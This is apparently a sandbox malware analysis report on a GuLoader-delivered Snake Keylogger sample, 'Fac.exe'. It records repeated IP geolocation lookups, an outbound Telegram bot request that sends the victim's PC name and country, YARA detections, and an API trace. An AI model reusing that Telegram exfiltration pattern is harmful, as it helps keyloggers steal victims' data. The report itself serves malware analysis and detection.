<Response><IP>191.96.150.191</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</Time

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.11.20	49771	104.21.67.152	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:26 UTC	63	OUT	GET /xml/191.96.150.191 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 13:53:26 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:26 GMT Content-Type: text/xml Content-Length: 364 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 0 Last-Modified: Mon, 18 Nov 2024 13:53:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NArSliUOxykRZHk99JYj2aOFxw0mCfRV5PrfOvQS1uf1jkjgB%2B3BaQsN%2FEGwH1O6qpaIcFvVDuP%2BDvpW2hpEK9KpXJNJosupKxv60N6EjD0YH%2Bf1M9PVUjK7Gvs3m9VifFRjEej1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e48725ee9fc8c0c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=95007&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=40204&cwnd=252&unsent_bytes=0&cid=6edaaa56429d2b86&ts=269&x=0"
2024-11-18 13:53:26 UTC	364	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: <Response><IP>191.96.150.191</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</Time

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.11.20	49773	104.21.67.152	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:27 UTC	87	OUT	GET /xml/191.96.150.191 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 13:53:27 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:27 GMT Content-Type: text/xml Content-Length: 364 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 1 Last-Modified: Mon, 18 Nov 2024 13:53:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VP7I68cdSmoXgvk2wvLVxNUY5cMDSP%2FwRemYrkjAij0PS33d0U0ULMTLA3iXygpHpkmCYJuKmPKE4f0Gi0ZEqce%2B%2F6PxA2jzruT0MRApJ2iXT%2B2r%2Fa4qPM%2BtFI2e%2F9ambmKzh3pU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4872641869c332-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94699&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=40389&cwnd=247&unsent_bytes=0&cid=11f66e561cbbdab4&ts=263&x=0"
2024-11-18 13:53:27 UTC	364	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: <Response><IP>191.96.150.191</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</Time

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.11.20	49775	104.21.67.152	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:28 UTC	87	OUT	GET /xml/191.96.150.191 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 13:53:28 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:28 GMT Content-Type: text/xml Content-Length: 364 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 2 Last-Modified: Mon, 18 Nov 2024 13:53:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kftT%2FlfxVFNP8TiKYFP9u7WboGkkBAbgoHAU6GkVdQnO3OltIa94AkG7sl4L7d%2BFzTya4HyIi5bEPnSY4paB3hBI7dfZDsrnu%2FPTRtLVM2VlnJCx%2BNF77xSHHD7MvucfM7XEfVf3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4872691a1d72b3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94520&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=40546&cwnd=252&unsent_bytes=0&cid=594101091fde7c87&ts=248&x=0"
2024-11-18 13:53:28 UTC	364	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: <Response><IP>191.96.150.191</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</Time

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.11.20	49777	104.21.67.152	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:29 UTC	87	OUT	GET /xml/191.96.150.191 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 13:53:29 UTC	853	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:29 GMT Content-Type: text/xml Content-Length: 364 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 3 Last-Modified: Mon, 18 Nov 2024 13:53:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ej05gzdd2HvGqVTuc2KLVoP3cuQsUe%2Fenrhi64AlTJ0uE3YQRZyzPv%2FwMiCJJ0w%2FrMug825rQ1naG8NmxvI8L%2Bz%2Fk4LYLqUtbgrVqJk%2BDFFHF%2Fr4qa4C6cWoJUi61WcPG131E5lN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e48726e2d794276-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94782&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=40404&cwnd=238&unsent_bytes=0&cid=eb84e238130cbade&ts=258&x=0"
2024-11-18 13:53:29 UTC	364	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: <Response><IP>191.96.150.191</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</Time

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.11.20	49779	104.21.67.152	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:29 UTC	87	OUT	GET /xml/191.96.150.191 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 13:53:30 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:30 GMT Content-Type: text/xml Content-Length: 364 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4 Last-Modified: Mon, 18 Nov 2024 13:53:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LNISVaztN7yBedzZ9BTkUUFGn1W9axeC00%2BzlanmPTpbfGnfiglZ7ALv0oQDochGGe6%2Fazbk1e37vIihqOUNKmrORL%2FYXUxSfi6kY%2FJNqUyVNGe35ei0NDI%2FT3xURANVSO04FJZ0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4872734b598cc8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94922&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=40325&cwnd=243&unsent_bytes=0&cid=10d7bd27b50cdf37&ts=261&x=0"
2024-11-18 13:53:30 UTC	364	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: <Response><IP>191.96.150.191</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</Time

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.11.20	49781	104.21.67.152	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:30 UTC	87	OUT	GET /xml/191.96.150.191 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 13:53:31 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:30 GMT Content-Type: text/xml Content-Length: 364 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 4 Last-Modified: Mon, 18 Nov 2024 13:53:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xPjzFVQhafuwbwcM3Fm1LDjOLthMGiB3P0%2BFuAETTeZMNRqaR5FAsxUKhoZ0z%2BzmvmF6o0h5X9yOGYptehTdIAsSx%2BnZrly5%2F695EN9cCNE43AvDQD9K9sY6loLqEIWLGIGh7tfO"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e4872785bb34303-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=95992&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=39844&cwnd=252&unsent_bytes=0&cid=428d8d2f8f120136&ts=264&x=0"
2024-11-18 13:53:31 UTC	364	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: <Response><IP>191.96.150.191</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</Time

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.11.20	49783	104.21.67.152	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:31 UTC	87	OUT	GET /xml/191.96.150.191 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 13:53:31 UTC	841	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:31 GMT Content-Type: text/xml Content-Length: 364 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 5 Last-Modified: Mon, 18 Nov 2024 13:53:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TzOoZV3OuoWPrtdyYR7gwQqtS9gabuLNK6%2F4JRqexyB2alLQ3zZvR3YReT9D2xgNG6ZW76LL4MWNRao1ohJD7nUrS3ybxiMsYvNuo2ZfOjZffBwaCPHxTPWHPNuBopkfxu0C8Tze"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e48727d6bdd7298-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94172&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40595&cwnd=252&unsent_bytes=0&cid=18335da979960200&ts=266&x=0"
2024-11-18 13:53:31 UTC	364	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: <Response><IP>191.96.150.191</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</Time

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.11.20	49785	104.21.67.152	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:32 UTC	87	OUT	GET /xml/191.96.150.191 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 13:53:32 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 13:53:32 GMT Content-Type: text/xml Content-Length: 364 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 6 Last-Modified: Mon, 18 Nov 2024 13:53:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COOEWsrkH5yFAx2HFWD7LcnCeu2KBRh%2FekvRkXagPCGcmjlUeX03aQhZ1N%2B5fHHGCGR99JqSkGbrkY19HTerCVm6PMfChZ35hYOti6cz40UQa5isUvi6yXRYdhRn%2BhfQCLPyPs%2F0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e487283a8900ca0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=94108&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=40480&cwnd=252&unsent_bytes=0&cid=00bb9874f08b0b02&ts=259&x=0"
2024-11-18 13:53:32 UTC	364	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 39 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 Data Ascii: <Response><IP>191.96.150.191</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</Time

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.11.20	49786	149.154.167.220	443	6840	C:\Users\user\Desktop\Fac.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 13:53:33 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2018/11/2024%20/%2016:31:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-18 13:53:33 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 18 Nov 2024 13:53:33 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-18 13:53:33 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	08:52:52
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\Fac.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Fac.exe"
Imagebase:	0x400000
File size:	722'501 bytes
MD5 hash:	54025D91662E8FA2169596CD35431CDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.42430985233.0000000006462000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:53:14
Start date:	18/11/2024
Path:	C:\Users\user\Desktop\Fac.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Fac.exe"
Imagebase:	0x400000
File size:	722'501 bytes
MD5 hash:	54025D91662E8FA2169596CD35431CDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.43474377171.0000000033C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	17.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.6%
Total number of Nodes:	1572
Total number of Limit Nodes:	35

Executed Functions

Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040337C
GetVersion.KERNEL32 ref: 00403382
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
OleInitialize.OLE32(00000000), ref: 004033F9
SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Fac.exe",00000020,"C:\Users\user\Desktop\Fac.exe",00000000,?,00000006,00000008,0000000A), ref: 00403462

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040359C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035D5
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E6
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035EE
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403602

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
ExitProcess.KERNEL32 ref: 004036EE
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Fac.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Fac.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
